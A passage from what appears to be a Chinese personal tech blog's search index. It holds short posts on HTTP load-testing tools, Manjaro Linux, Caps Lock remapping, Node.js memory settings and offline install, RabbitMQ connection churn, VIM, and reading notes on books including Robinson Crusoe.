http://127.0.0.1:8080/index.html Running 30s test @ http://127.0.0.1:8080/index.html 12 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 635.91us 0.89ms 12.92ms 93.69% Req/Sec 56.20k 8.07k 62.00k 86.54% 22464657 requests in 30.00s, 17.76GB read Requests/sec: 748868.53 Transfer/sec: 606.33MB k6 k6 is a modern load testing tool, building on our years of experience in the load and performance testing industry. It provides a clean, approachable scripting API, local and cloud execution, and flexible configuration.This is how load testing should look in the 21st century.\nhttps://github.com/k6io/k6 go语言开发 优点 支持使用脚本开发测试 功能强大 \u0026hellip;\u0026hellip; 支持将测试结果直接写入influxdb, 这是亮点啊 缺点 如果你只想用几个参数来测试接口,大可不必用k6 安装 # macos brew install k6 // 其他平台也是支持的,参考官方文档 autocannon Javascript/Node.js https://github.com/mcollina/autocannon 优点 如果你是Node.js开发者,安装autocannon是非常简单的 安装 npm i autocannon -g 使用 ali https://github.com/nakabonne/ali go语言开发 特点 支持自动在控制台绘图 安装 brew install nakabonne/ali/ali ","permalink":"https://wdd.js.org/posts/2021/05/fxv15g/","summary":"ab C语言 优点 安装简单 缺点 不支持指定测试时长 安装 # debian/ubuntu apt-get install apache2-utils # centos yum -y install httpd-tools wrk https://github.com/wg/wrk C语言 优点 支持lua脚本 wrk is a modern HTTP benchmarking tool capable of generating significant load when run on a single multi-core CPU. It combines a multithreaded design with scalable event notification systems such as epoll and kqueue. An optional LuaJIT script can perform HTTP request generation, response processing, and custom reporting.","title":"5个接口压力测试工具"},{"content":"overview 我主要使用过4个操纵系统。windows,macos,ubuntu,manjaro,每个操作系统,我都有上年或者上月的使用体会。\n如果你是普通用户,无论工作还是学习,都不涉及到写代码的话。windows和mac是最好的选择,如果你是一名开发人员,那么macos,ubuntu和manjaro都是可以选择的。\n我是一个很容易接受操切换作系统改变的人,从每个系统上我都可以很顺畅的切换。但是并不是所有人都是如此,有些人即使用了一年多的mac,还是无法接受,最终又换回了windows。\nchangelog 大学到工作第一年,我一直用windows,满足各种需求 工作第二年,我换了mac。因为我想轻便的笔记本,另外也想尝尝鲜。mac的屏幕、界面UI、触摸板都是值得称道的地方,键盘体验就不足人意了。 从mac切换到ubuntu, macbook使用接近4年了。明显感觉到一些性能上的不足,刚好又发现一台空闲的台式机没人用,台式机性能不错,之前是做服务器的,CPU、内存、磁盘资源都比较丰富。然后我就在上面安装了ubuntu。系统的初始化软件安装有些折腾人,要安装中文输入法,常见的软件例如微信和QQ, 安装还是有些难度的。ubuntu刚开始使用还是比较流畅的,但是接下来遇到非常致命的问题,UI经常卡死。查下来发现和Xorg以及系统的显卡有关,网上搜了下,很多人遇到类似的问题,也尝试了一些解决方案,但是还是无法解决。索性我就关了ubuntu的图形界面,仅仅ssh远程开发。 从ubuntu切换到macos, 恢复到之前的状态,感觉很好。但是看到macbook pro上接的扩展坞,以及被各种线缆高的乱糟糟的桌面,想尝试其他Linux发行版的想法又在心里悄悄发了芽,一路疯长。 道除了ubuntu, 就没有其他选择了吗?调研一番,发现了manjaro这个发行版,用户评价很不错。然后我就试试看,结果发现安装各种软件比ubuntu方便多了,试用了几天,也是越来越喜欢。又发现了一个宝藏发行版。 其实我一直对manjaro这个单词又很大的好奇,这个英文名是什么意思呢?词典上没有对这个英文词的介绍,只是说是一个linux发行版。 manjaro 什么意思?如何发音? marjaro这个词来自kilimanjaro, 乞力马扎罗是非洲最高的高山,这座山是由于火山爆发所产生的,这个可能比较贴合marjaro的滚动发布的特点,也说明这个发行版是比较活跃的吧。\nAlthough the inspiration for the name originates from Mount Kilimanjaro, it may be pronounced as \u0026lsquo;Man-jar-o\u0026rsquo; or as \u0026lsquo;Man-ha-ro\u0026rsquo;. https://wiki.manjaro.org/index.php/Manjaro_FAQ\n乞力马扎罗山(斯瓦西里语:Kilimanjaro,意为“灿烂发光的山”)位于坦桑尼亚东北的乞力马扎罗区,临近肯尼亚边界,是非洲的最高山,常被称为“非洲屋脊”、“非洲之王”。其最高峰为基博峰(也称乌呼鲁峰),海拔5895米。\nmanjaro发行版的特点 图形化安装界面,非常方便 自带图形界面 自动硬件检测,图形化支持做的比ubuntu好太多 滚动更新 非常多的包,可以使用AUR来安装包 相比与Arch, manjaro对新手非常友好 参考 https://manjaro.org/terms-of-use/ Developed in Austria, France, and Germany, Manjaro provides all the benefits of the Arch operating system combined with a focus on user-friendliness and accessibility. https://wiki.manjaro.org/index.php/About_Manjaro\nhttps://wiki.manjaro.org/index.php/Manjaro:A_Different_Kind_of_Beast https://wiki.manjaro.org/index.php/Manjaro_FAQ https://wiki.manjaro.org/index.php/Main_Page https://wiki.manjaro.org/index.php/Using_Manjaro_for_Beginners ","permalink":"https://wdd.js.org/posts/2021/05/cntrwh/","summary":"overview 我主要使用过4个操纵系统。windows,macos,ubuntu,manjaro,每个操作系统,我都有上年或者上月的使用体会。\n如果你是普通用户,无论工作还是学习,都不涉及到写代码的话。windows和mac是最好的选择,如果你是一名开发人员,那么macos,ubuntu和manjaro都是可以选择的。\n我是一个很容易接受操切换作系统改变的人,从每个系统上我都可以很顺畅的切换。但是并不是所有人都是如此,有些人即使用了一年多的mac,还是无法接受,最终又换回了windows。\nchangelog 大学到工作第一年,我一直用windows,满足各种需求 工作第二年,我换了mac。因为我想轻便的笔记本,另外也想尝尝鲜。mac的屏幕、界面UI、触摸板都是值得称道的地方,键盘体验就不足人意了。 从mac切换到ubuntu, macbook使用接近4年了。明显感觉到一些性能上的不足,刚好又发现一台空闲的台式机没人用,台式机性能不错,之前是做服务器的,CPU、内存、磁盘资源都比较丰富。然后我就在上面安装了ubuntu。系统的初始化软件安装有些折腾人,要安装中文输入法,常见的软件例如微信和QQ, 安装还是有些难度的。ubuntu刚开始使用还是比较流畅的,但是接下来遇到非常致命的问题,UI经常卡死。查下来发现和Xorg以及系统的显卡有关,网上搜了下,很多人遇到类似的问题,也尝试了一些解决方案,但是还是无法解决。索性我就关了ubuntu的图形界面,仅仅ssh远程开发。 从ubuntu切换到macos, 恢复到之前的状态,感觉很好。但是看到macbook pro上接的扩展坞,以及被各种线缆高的乱糟糟的桌面,想尝试其他Linux发行版的想法又在心里悄悄发了芽,一路疯长。 道除了ubuntu, 就没有其他选择了吗?调研一番,发现了manjaro这个发行版,用户评价很不错。然后我就试试看,结果发现安装各种软件比ubuntu方便多了,试用了几天,也是越来越喜欢。又发现了一个宝藏发行版。 其实我一直对manjaro这个单词又很大的好奇,这个英文名是什么意思呢?词典上没有对这个英文词的介绍,只是说是一个linux发行版。 manjaro 什么意思?如何发音? marjaro这个词来自kilimanjaro, 乞力马扎罗是非洲最高的高山,这座山是由于火山爆发所产生的,这个可能比较贴合marjaro的滚动发布的特点,也说明这个发行版是比较活跃的吧。\nAlthough the inspiration for the name originates from Mount Kilimanjaro, it may be pronounced as \u0026lsquo;Man-jar-o\u0026rsquo; or as \u0026lsquo;Man-ha-ro\u0026rsquo;. https://wiki.manjaro.org/index.php/Manjaro_FAQ\n乞力马扎罗山(斯瓦西里语:Kilimanjaro,意为“灿烂发光的山”)位于坦桑尼亚东北的乞力马扎罗区,临近肯尼亚边界,是非洲的最高山,常被称为“非洲屋脊”、“非洲之王”。其最高峰为基博峰(也称乌呼鲁峰),海拔5895米。\nmanjaro发行版的特点 图形化安装界面,非常方便 自带图形界面 自动硬件检测,图形化支持做的比ubuntu好太多 滚动更新 非常多的包,可以使用AUR来安装包 相比与Arch, manjaro对新手非常友好 参考 https://manjaro.org/terms-of-use/ Developed in Austria, France, and Germany, Manjaro provides all the benefits of the Arch operating system combined with a focus on user-friendliness and accessibility.","title":"又发现了一个宝藏linux发行版 manjaro"},{"content":"获取环境变量 Authorization: \u0026#34;Basic {tavern.env_vars.SECRET_CI_COMMIT_AUTH}\u0026#34; x-www-form-urlencoded request: url: \u0026#34;{test_host}/form_data\u0026#34; method: POST data: id: abc123 按照name过滤运行测试 -k This can then be selected with the -k flag to pytest - e.g. pass pytest-kfake to run all tests with ‘fake’ in the name.\n比如只运行名称包含fake的测试\npy.test -k fake ","permalink":"https://wdd.js.org/posts/2021/05/xneq08/","summary":"获取环境变量 Authorization: \u0026#34;Basic {tavern.env_vars.SECRET_CI_COMMIT_AUTH}\u0026#34; x-www-form-urlencoded request: url: \u0026#34;{test_host}/form_data\u0026#34; method: POST data: id: abc123 按照name过滤运行测试 -k This can then be selected with the -k flag to pytest - e.g. pass pytest-kfake to run all tests with ‘fake’ in the name.\n比如只运行名称包含fake的测试\npy.test -k fake ","title":"tavern"},{"content":"大写锁定键一般都是非常鸡肋的功能。\n仅仅一次生效 setxkbmap -option caps:escape 大写锁定键改为esc setxkbmap -option ctrl:nocaps 大写锁定键改为ctrl 永久生效 /etc/X11/xorg.conf.d/90-custom-kbd.conf Section \u0026#34;InputClass\u0026#34; Identifier \u0026#34;keyboard defaults\u0026#34; MatchIsKeyboard \u0026#34;on\u0026#34; Option \u0026#34;XKbOptions\u0026#34; \u0026#34;caps:escape\u0026#34; EndSection 注销或者重启后生效\nhttps://superuser.com/questions/566871/how-to-map-the-caps-lock-key-to-escape-key-in-arch-linuxhttps://wiki.archlinux.org/title/X_keyboard_extension\n","permalink":"https://wdd.js.org/posts/2021/05/eafyk8/","summary":"大写锁定键一般都是非常鸡肋的功能。\n仅仅一次生效 setxkbmap -option caps:escape 大写锁定键改为esc setxkbmap -option ctrl:nocaps 大写锁定键改为ctrl 永久生效 /etc/X11/xorg.conf.d/90-custom-kbd.conf Section \u0026#34;InputClass\u0026#34; Identifier \u0026#34;keyboard defaults\u0026#34; MatchIsKeyboard \u0026#34;on\u0026#34; Option \u0026#34;XKbOptions\u0026#34; \u0026#34;caps:escape\u0026#34; EndSection 注销或者重启后生效\nhttps://superuser.com/questions/566871/how-to-map-the-caps-lock-key-to-escape-key-in-arch-linuxhttps://wiki.archlinux.org/title/X_keyboard_extension","title":"大写锁定键映射为escape"},{"content":"笔记本导出牛津通识读本:数学(中文版)蒂莫西·高尔斯\n第二章 数与抽象标注(黄色) - 位置 483重要的只是它们所遵循的规则。标注(黄色) - 位置 486我们通过接受 i作出小小的投资,结果得到了许多倍的回报。\n","permalink":"https://wdd.js.org/posts/2021/05/wsoivr/","summary":"笔记本导出牛津通识读本:数学(中文版)蒂莫西·高尔斯\n第二章 数与抽象标注(黄色) - 位置 483重要的只是它们所遵循的规则。标注(黄色) - 位置 486我们通过接受 i作出小小的投资,结果得到了许多倍的回报。","title":"牛津通识读本:数学(中文版)笔记"},{"content":"第一章 人生的起点标注(黄色) - 位置 44他对我说,只有那些穷到走投无路,或心怀大志的巨富,才会选择出海冒险,想让自己以非凡的事业扬名于世。\n走投无路的穷人剩下的只是作为动物的本能,怎么可能和心怀大志的巨富相提并论呢\n标注(黄色) - 位置 194在去伦敦的路上,以及到了伦敦以后,我内心一直剧烈挣扎,我到底该选什么样的人生道路,我该回家还是该航海?\n我相信,每个人都有面对人生道路的艰难抉择的时候。\n第三章 荒岛遇难标注(黄色) - 位置 621“因为突来的欣喜,如同突来的悲伤,都令人难以承受。”\n悲伤与快乐都是来自比较。\n第六章 生病以及良心有愧标注(黄色) - 位置 1193大麦刚刚长出来的时候,我曾深受感动,第一次认为那是上帝显示的神迹。不过后来发现那不是神迹以后,所有从它而来的感动就随之消失了。\n无法解释的时候,才会想到鬼神。\n第九章 小船标注(黄色) - 位置 1701我认为,我们之所以感到缺乏和不满足,是因为我们对已经拥有的东西缺少感恩之心。\n看到苹果又出了新手机,macbook pro又出了新款的m1笔记本,对比我本自己目前手中所拥有的东西,你真的珍惜过吗? 得不到的永远在骚动 \u0026ndash;《红玫瑰》\n第十章 驯养山羊标注(黄色) - 位置 1797我在统治这岛——或者说,被囚禁在这岛——的第六年的十一月六日\n你在获得无尽的自由的时候,也被自由所囚禁。\n第十七章 叛乱者到访标注(黄色) - 位置 3187你知道,”他说,“以色列的百姓一开始获救离开埃及的时候,人人欢欣鼓舞,但是,当他们在旷野里缺乏面包时,他们甚至背叛了拯救他们的\n人性而已\n第十九章 重返英国标注(黄色) - 位置 3714等医生问明了病因之后,他给我放了血,之后我才放松下来,逐渐好转。\n我曾听过放血疗法,没想到还真的在小说中看过。\n标注(黄色) - 位置 3715我相信,如果当时没有用放血来舒缓我激动的情绪,我早就死了。\n第二十章 星期五与熊之战标注(黄色) - 位置 4018那条船上除了一些必需品,我还给他们送了七个女人去。她们是我亲自鉴别的,有的适于干活,有的适于做老婆,只要那边有人愿意娶她们。\n惊讶了,鲁滨逊在那里找到的女人,是奴隶吗?\n标注(黄色) - 位置 4025以及我个人在后续十多年中各种新的冒险和奇遇,我会在我的第二部冒险故事中一一叙述。\n好像没有第二部吧\n","permalink":"https://wdd.js.org/posts/2021/05/uvq06k/","summary":"第一章 人生的起点标注(黄色) - 位置 44他对我说,只有那些穷到走投无路,或心怀大志的巨富,才会选择出海冒险,想让自己以非凡的事业扬名于世。\n走投无路的穷人剩下的只是作为动物的本能,怎么可能和心怀大志的巨富相提并论呢\n标注(黄色) - 位置 194在去伦敦的路上,以及到了伦敦以后,我内心一直剧烈挣扎,我到底该选什么样的人生道路,我该回家还是该航海?\n我相信,每个人都有面对人生道路的艰难抉择的时候。\n第三章 荒岛遇难标注(黄色) - 位置 621“因为突来的欣喜,如同突来的悲伤,都令人难以承受。”\n悲伤与快乐都是来自比较。\n第六章 生病以及良心有愧标注(黄色) - 位置 1193大麦刚刚长出来的时候,我曾深受感动,第一次认为那是上帝显示的神迹。不过后来发现那不是神迹以后,所有从它而来的感动就随之消失了。\n无法解释的时候,才会想到鬼神。\n第九章 小船标注(黄色) - 位置 1701我认为,我们之所以感到缺乏和不满足,是因为我们对已经拥有的东西缺少感恩之心。\n看到苹果又出了新手机,macbook pro又出了新款的m1笔记本,对比我本自己目前手中所拥有的东西,你真的珍惜过吗? 得不到的永远在骚动 \u0026ndash;《红玫瑰》\n第十章 驯养山羊标注(黄色) - 位置 1797我在统治这岛——或者说,被囚禁在这岛——的第六年的十一月六日\n你在获得无尽的自由的时候,也被自由所囚禁。\n第十七章 叛乱者到访标注(黄色) - 位置 3187你知道,”他说,“以色列的百姓一开始获救离开埃及的时候,人人欢欣鼓舞,但是,当他们在旷野里缺乏面包时,他们甚至背叛了拯救他们的\n人性而已\n第十九章 重返英国标注(黄色) - 位置 3714等医生问明了病因之后,他给我放了血,之后我才放松下来,逐渐好转。\n我曾听过放血疗法,没想到还真的在小说中看过。\n标注(黄色) - 位置 3715我相信,如果当时没有用放血来舒缓我激动的情绪,我早就死了。\n第二十章 星期五与熊之战标注(黄色) - 位置 4018那条船上除了一些必需品,我还给他们送了七个女人去。她们是我亲自鉴别的,有的适于干活,有的适于做老婆,只要那边有人愿意娶她们。\n惊讶了,鲁滨逊在那里找到的女人,是奴隶吗?\n标注(黄色) - 位置 4025以及我个人在后续十多年中各种新的冒险和奇遇,我会在我的第二部冒险故事中一一叙述。\n好像没有第二部吧","title":"鲁滨逊漂流记 笔记与读后感"},{"content":"环境: ARM64\n\u0026lt;--- Last few GCs ---\u0026gt; \u0026lt;--- JS stacktrace ---\u0026gt; # # Fatal process OOM in insufficient memory to create an Isolate # 在Dockerfile上设置max-old-space-size的node.js启动参数, 亲测有效。\nCMD node --report-on-fatalerror --max-old-space-size=1536 dist/index.js Currently, by default v8 has a memory limit of 512mb on 32-bit and 1gb on 64-bit systems. You can raise the limit by setting \u0026ndash;max-old-space-size to a maximum of ~1gb for 32-bit and ~1.7gb for 64-bit systems. But it is recommended to split your single process into several workers if you are hitting memory limits.\n参考 https://nodejs.org/api/cli.html#cli_max_old_space_size_size_in_megabytes https://stackoverflow.com/questions/54919258/ng-commands-throws-insufficient-memory-error-fatal-process-oom-in-insufficient https://medium.com/@vuongtran/how-to-solve-process-out-of-memory-in-node-js-5f0de8f8464c ","permalink":"https://wdd.js.org/fe/oom-in-insufficient-memory/","summary":"环境: ARM64\n\u0026lt;--- Last few GCs ---\u0026gt; \u0026lt;--- JS stacktrace ---\u0026gt; # # Fatal process OOM in insufficient memory to create an Isolate # 在Dockerfile上设置max-old-space-size的node.js启动参数, 亲测有效。\nCMD node --report-on-fatalerror --max-old-space-size=1536 dist/index.js Currently, by default v8 has a memory limit of 512mb on 32-bit and 1gb on 64-bit systems. You can raise the limit by setting \u0026ndash;max-old-space-size to a maximum of ~1gb for 32-bit and ~1.7gb for 64-bit systems. But it is recommended to split your single process into several workers if you are hitting memory limits.","title":"Fatal process OOM in insufficient memory to create an Isolate"},{"content":"联通官方客服已经开始割韭菜了。\n前两天10010给我打电话,一个女客服操着浓重的口音,兴奋的给说我是优质客户,然后因为回馈老用户的关系,每个月会多送我2个G的5G高速流量。\n我当时很警觉,立马问她这个会对我原来的套餐有影响吗,她说没任何影响,接着殷切的问我要不要办理。我思考了一下,觉得不用花钱,又多了2个G的流量,索性就办理了。\n今天我在联通掌上营业厅上查自己的实时话费,突然多出了一项9元的流量叠加包月套餐费。的确对我原来的套餐没有影响,只是多了一个新的业务。😂\n我思来想去,我应该没有办理这个套餐啊?哪里冒出来的。然后仔细的从迷宫似的掌上营业厅上查找套餐信息。结果给我找到了下面的信息。\n我当时很生气,当时客服给我介绍流量包的时候,从始至终没有提这个流量包要收费的事情。我也是大意了,没有闪。\n接着我就打了10010的官方客服,然后走人工投诉,最终取消了这个套餐。\n我想,这种电话应该很多人都接过吧,被骗的应该不只是少数,如果不仔细看自己的账单,我也不知道有这件事情。\n从这件事事情我也反省自己:\n官方客服也不要信 客服说的话,都要当作放屁 没有看到黑纸白字的承诺,都是骗人的 不要想贪小便宜,否则自己就会被当作韭菜 ","permalink":"https://wdd.js.org/posts/2021/05/ae2rme/","summary":"联通官方客服已经开始割韭菜了。\n前两天10010给我打电话,一个女客服操着浓重的口音,兴奋的给说我是优质客户,然后因为回馈老用户的关系,每个月会多送我2个G的5G高速流量。\n我当时很警觉,立马问她这个会对我原来的套餐有影响吗,她说没任何影响,接着殷切的问我要不要办理。我思考了一下,觉得不用花钱,又多了2个G的流量,索性就办理了。\n今天我在联通掌上营业厅上查自己的实时话费,突然多出了一项9元的流量叠加包月套餐费。的确对我原来的套餐没有影响,只是多了一个新的业务。😂\n我思来想去,我应该没有办理这个套餐啊?哪里冒出来的。然后仔细的从迷宫似的掌上营业厅上查找套餐信息。结果给我找到了下面的信息。\n我当时很生气,当时客服给我介绍流量包的时候,从始至终没有提这个流量包要收费的事情。我也是大意了,没有闪。\n接着我就打了10010的官方客服,然后走人工投诉,最终取消了这个套餐。\n我想,这种电话应该很多人都接过吧,被骗的应该不只是少数,如果不仔细看自己的账单,我也不知道有这件事情。\n从这件事事情我也反省自己:\n官方客服也不要信 客服说的话,都要当作放屁 没有看到黑纸白字的承诺,都是骗人的 不要想贪小便宜,否则自己就会被当作韭菜 ","title":"官方客服也开始割韭菜"},{"content":"我只使用VIM作为主力开发工具,已经快到200天了。聊聊这其中的一些感受。\n对大部分来说,提到文本编辑器,我们可能会想到word, nodepad++, webstorm, sublime, vscode。\n这些GUI工具在给我们提供便利性的同时,也在逐渐固化我们对于编辑器的认知与思维方式。\n闭上眼睛,提到编辑器,你脑海里想到的界面是什么呢?\n左边一个文件浏览窗口 右边一个多标签页的文件编辑窗口 陌生感 想象一下,我们在使用编辑器的时候,哪些动作做的最多\n鼠标移动到文件浏览窗口,通过滚轮的滚动,来选择文件,单击之后,打开一个文件。但是在VIM上,完全没有这种操作。 GUI下可以同时打开多个文件,进行编辑。但是很多人觉得VIM只能打开一个文件,甚至想打开另一个文件的时候,先要退出VIM。即使打开了多个文件,也不知道这些文件要如何切换。 但是当你刚开始使用VIM的时候,可能并没有安装什么插件,这时候你会有以下的一些困惑\n你用VIM打开一个文件后,怎么再打开一个文件呢?因为默认的VIM是没有文件浏览窗口的。你在GUI模式下养成的经验,在VIM上完全无法使用。你可能甚至不知道要怎么退出VIM。所有的一切都那么陌生。\n虚无感 VIM一般都运行在终端之上,给人感觉云里雾里,虚无缥缈。而编辑器就不同了,你看到的文件夹,打开的文件,对你来说就像是身上穿的衣服,手里搬的砖。终端呢,黑乎乎的,没啥颜色与图标,看起来那么不切实际,仿佛是天边的云彩,千变万化,无法琢磨。\n恐惧感 很多人可能做过那种梦,就是在梦里感觉自己在自由落体,然后惊醒。在你使用VIM的时候,可能也会有这种感觉。例如,一个文件我写了几百行了,万一ssh远程连接断了,或者说终端崩溃了,我写的文件会不会丢呢?为了安全起见,还是不用VIM吧。\n挫折感 使用VIM的时候,你必然要经历过很多困难,这些困难让你感觉到挫折,失去了继续学习的欲望。内心的另外一个人可能会说,我只想安安静静地做一个写代码的美男子,为什么要折腾这毫无颜值、难用的VIM呢?\n","permalink":"https://wdd.js.org/vim/why-you-leave-vim/","summary":"我只使用VIM作为主力开发工具,已经快到200天了。聊聊这其中的一些感受。\n对大部分来说,提到文本编辑器,我们可能会想到word, nodepad++, webstorm, sublime, vscode。\n这些GUI工具在给我们提供便利性的同时,也在逐渐固化我们对于编辑器的认知与思维方式。\n闭上眼睛,提到编辑器,你脑海里想到的界面是什么呢?\n左边一个文件浏览窗口 右边一个多标签页的文件编辑窗口 陌生感 想象一下,我们在使用编辑器的时候,哪些动作做的最多\n鼠标移动到文件浏览窗口,通过滚轮的滚动,来选择文件,单击之后,打开一个文件。但是在VIM上,完全没有这种操作。 GUI下可以同时打开多个文件,进行编辑。但是很多人觉得VIM只能打开一个文件,甚至想打开另一个文件的时候,先要退出VIM。即使打开了多个文件,也不知道这些文件要如何切换。 但是当你刚开始使用VIM的时候,可能并没有安装什么插件,这时候你会有以下的一些困惑\n你用VIM打开一个文件后,怎么再打开一个文件呢?因为默认的VIM是没有文件浏览窗口的。你在GUI模式下养成的经验,在VIM上完全无法使用。你可能甚至不知道要怎么退出VIM。所有的一切都那么陌生。\n虚无感 VIM一般都运行在终端之上,给人感觉云里雾里,虚无缥缈。而编辑器就不同了,你看到的文件夹,打开的文件,对你来说就像是身上穿的衣服,手里搬的砖。终端呢,黑乎乎的,没啥颜色与图标,看起来那么不切实际,仿佛是天边的云彩,千变万化,无法琢磨。\n恐惧感 很多人可能做过那种梦,就是在梦里感觉自己在自由落体,然后惊醒。在你使用VIM的时候,可能也会有这种感觉。例如,一个文件我写了几百行了,万一ssh远程连接断了,或者说终端崩溃了,我写的文件会不会丢呢?为了安全起见,还是不用VIM吧。\n挫折感 使用VIM的时候,你必然要经历过很多困难,这些困难让你感觉到挫折,失去了继续学习的欲望。内心的另外一个人可能会说,我只想安安静静地做一个写代码的美男子,为什么要折腾这毫无颜值、难用的VIM呢?","title":"让你放弃VIM的一些原因"},{"content":"初中的时候,我曾经读过鲁滨逊漂流记,那时候这本书中最吸引我的是各种新奇的冒险体验,鲁滨逊接下来会遇到什么事情,是我最关注的事情。\n最近,我又开始读这本书了。是因为我感觉到很孤独,我不知道如何解决。我想,鲁滨逊一个人在一个荒岛上过了二十八年,他是如何面对孤独的呢?我想找到这个答案。\n写日记 小说中有不少的章节,都是鲁滨逊的日记。记录了他每天的工作和经历,通过写日志,他仿佛能够与自己对话。所以,有时候当我感到孤独的时候,我也写日记,把我的感想,我的困惑和烦恼统统写出来。对我自己来说,这也是一种释放。\n投身工作,制造产品,让自己忙活 除非生病或者下雨,鲁兵逊总是在不停的忙活着。\n收集葡萄,晒葡萄干 圈养小羊,让自己有充足的肉可以吃 种植大麦,自己制作面包 加固自己的房子 晒制陶土,制作陶器 环岛旅行 \u0026hellip; 鲁滨逊每天都在忙活着,每一天过得都非常有意义。我也觉得自己决不能浪费时间。\n找到自己的信仰 鲁滨逊在一次生病过程中,身体非常虚弱,当他回忆往事的时候,总觉得自己是个罪恶的人,无法得到谅解。但是偶然他得到一本《圣经》,他阅读圣经,从中找到自己的信仰。有信仰是非常幸福的事情,但是你若问我我的信仰是什么,我也不知道我的信仰是什么。\n这是最好的时代,也是最坏的时代。所有的人都觉得90后是压力最大的一代,90都神经也是最敏感的(腾讯张军的致敬青年,白岩松的“不会吧”)。我们承受着各种压力,其中最大的可能就是房价了。\n人生当中,自由自在可能仅仅是片刻的,承受压力却是主旋律。但是如何面对压力,却把人分成了不同的样子。有的人会被压力击垮,放弃抵抗,沉醉于各种网络精神鸦片中,有的人却能负重前行,坚持学习,一往无前。\n罗曼罗兰说过:这世上只有一种真正的英雄主义,就是认清生活的真相,并且任然热爱她。\n","permalink":"https://wdd.js.org/posts/2021/05/vzfo04/","summary":"初中的时候,我曾经读过鲁滨逊漂流记,那时候这本书中最吸引我的是各种新奇的冒险体验,鲁滨逊接下来会遇到什么事情,是我最关注的事情。\n最近,我又开始读这本书了。是因为我感觉到很孤独,我不知道如何解决。我想,鲁滨逊一个人在一个荒岛上过了二十八年,他是如何面对孤独的呢?我想找到这个答案。\n写日记 小说中有不少的章节,都是鲁滨逊的日记。记录了他每天的工作和经历,通过写日志,他仿佛能够与自己对话。所以,有时候当我感到孤独的时候,我也写日记,把我的感想,我的困惑和烦恼统统写出来。对我自己来说,这也是一种释放。\n投身工作,制造产品,让自己忙活 除非生病或者下雨,鲁兵逊总是在不停的忙活着。\n收集葡萄,晒葡萄干 圈养小羊,让自己有充足的肉可以吃 种植大麦,自己制作面包 加固自己的房子 晒制陶土,制作陶器 环岛旅行 \u0026hellip; 鲁滨逊每天都在忙活着,每一天过得都非常有意义。我也觉得自己决不能浪费时间。\n找到自己的信仰 鲁滨逊在一次生病过程中,身体非常虚弱,当他回忆往事的时候,总觉得自己是个罪恶的人,无法得到谅解。但是偶然他得到一本《圣经》,他阅读圣经,从中找到自己的信仰。有信仰是非常幸福的事情,但是你若问我我的信仰是什么,我也不知道我的信仰是什么。\n这是最好的时代,也是最坏的时代。所有的人都觉得90后是压力最大的一代,90都神经也是最敏感的(腾讯张军的致敬青年,白岩松的“不会吧”)。我们承受着各种压力,其中最大的可能就是房价了。\n人生当中,自由自在可能仅仅是片刻的,承受压力却是主旋律。但是如何面对压力,却把人分成了不同的样子。有的人会被压力击垮,放弃抵抗,沉醉于各种网络精神鸦片中,有的人却能负重前行,坚持学习,一往无前。\n罗曼罗兰说过:这世上只有一种真正的英雄主义,就是认清生活的真相,并且任然热爱她。","title":"再读鲁滨逊漂流记: 成年人如何面对孤独"},{"content":"魔女宅急便 琪琪 有点像花木兰 佐助 不认识 小樱 不认识 不认识 不认识 参考 https://designyoutrust.com/2021/04/person-uses-artificial-intelligence-to-make-anime-and-cartoon-characters-look-more-realistic/ ","permalink":"https://wdd.js.org/posts/2021/05/mfh46t/","summary":"魔女宅急便 琪琪 有点像花木兰 佐助 不认识 小樱 不认识 不认识 不认识 参考 https://designyoutrust.com/2021/04/person-uses-artificial-intelligence-to-make-anime-and-cartoon-characters-look-more-realistic/ ","title":"使用AI让卡通人物更加真实"},{"content":"连接抖动介绍 Workloads with high connection churn (a high rate of connections being opened and closed) will require TCP setting tuning to avoid exhaustion of certain resources: max number of file handles, Erlang processes on RabbitMQ nodes, kernel\u0026rsquo;s ephemeral port range (for hosts that open a lot of connections, including Federation links and Shovel connections), and others. Nodes that are exhausted of those resources won\u0026rsquo;t be able to accept new connections, which will negatively affect overall system availability.\n连接抖动,就是在单位时间内,有大量的连接产生,也同时有大量的连接关闭。这些抖动将会耗费大量的资源。\n从RabbitMq 3.7.9开始,引入了对抖动数据的统计。在mq管理界面上,可以看到下面的图标。\n下面是随时间变化,mq连接数的抖动情况。\nWhile connection and disconnection rates are system-specific, rates consistently above 100/second likely indicate a suboptimal connection management approach by one or more applications and usually are worth investigating.\n如果抖动的指标持续的超过每秒100个,这就需要引起注意了,需要调查下具体的抖动原因。\n抖动统计 抖动统计包括三个方面\nConnection Channel Queue 参考 https://www.rabbitmq.com/connections.html#high-connection-churn https://www.rabbitmq.com/networking.html#dealing-with-high-connection-churn https://vincent.bernat.ch/en/blog/2014-tcp-time-wait-state-linux https://www.rabbitmq.com/troubleshooting-networking.html#detecting-high-connection-churn ","permalink":"https://wdd.js.org/posts/2021/05/nr1shd/","summary":"连接抖动介绍 Workloads with high connection churn (a high rate of connections being opened and closed) will require TCP setting tuning to avoid exhaustion of certain resources: max number of file handles, Erlang processes on RabbitMQ nodes, kernel\u0026rsquo;s ephemeral port range (for hosts that open a lot of connections, including Federation links and Shovel connections), and others. Nodes that are exhausted of those resources won\u0026rsquo;t be able to accept new connections, which will negatively affect overall system availability.","title":"RabbitMq 大量的连接抖动"},{"content":"1. 选择安装包 访问 https://nodejs.org/en/download/ 选择Linux Binaries(x64) 2. 解压 下载后的文件是一个tar.xz的文件。\nxz -d node-xxxx.tar.zx // 解压xz tar -xvf node-xxxx.tar // 拿出文件夹 解压后的目录如下,其中\n➜ node-v14.17.0-linux-x64 ll total 600K drwxr-xr-x 2 wangdd staff 4.0K May 13 09:34 bin -rw-r--r-- 1 wangdd staff 469K May 12 02:14 CHANGELOG.md drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 include drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 lib -rw-r--r-- 1 wangdd staff 79K May 12 02:14 LICENSE -rw-r--r-- 1 wangdd staff 30K May 12 02:14 README.md drwxr-xr-x 5 wangdd staff 4.0K May 12 02:14 share // bin目录下就是nodejs的可执行程序 ➜ node-v14.17.0-linux-x64 ll bin total 71M -rwxr-xr-x 1 wangdd staff 71M May 12 02:14 node lrwxrwxrwx 1 wangdd staff 38 May 12 02:14 npm -\u0026gt; ../lib/node_modules/npm/bin/npm-cli.js lrwxrwxrwx 1 wangdd staff 38 May 12 02:14 npx -\u0026gt; ../lib/node_modules/npm/bin/npx-cli.js ➜ node-v14.17.0-linux-x64 ./bin/node --version v14.17.0 通过将bin目录加入到$PATH环境变量中这种方式,就可以直接调用node。\n","permalink":"https://wdd.js.org/fe/install-nodejs-offline/","summary":"1. 选择安装包 访问 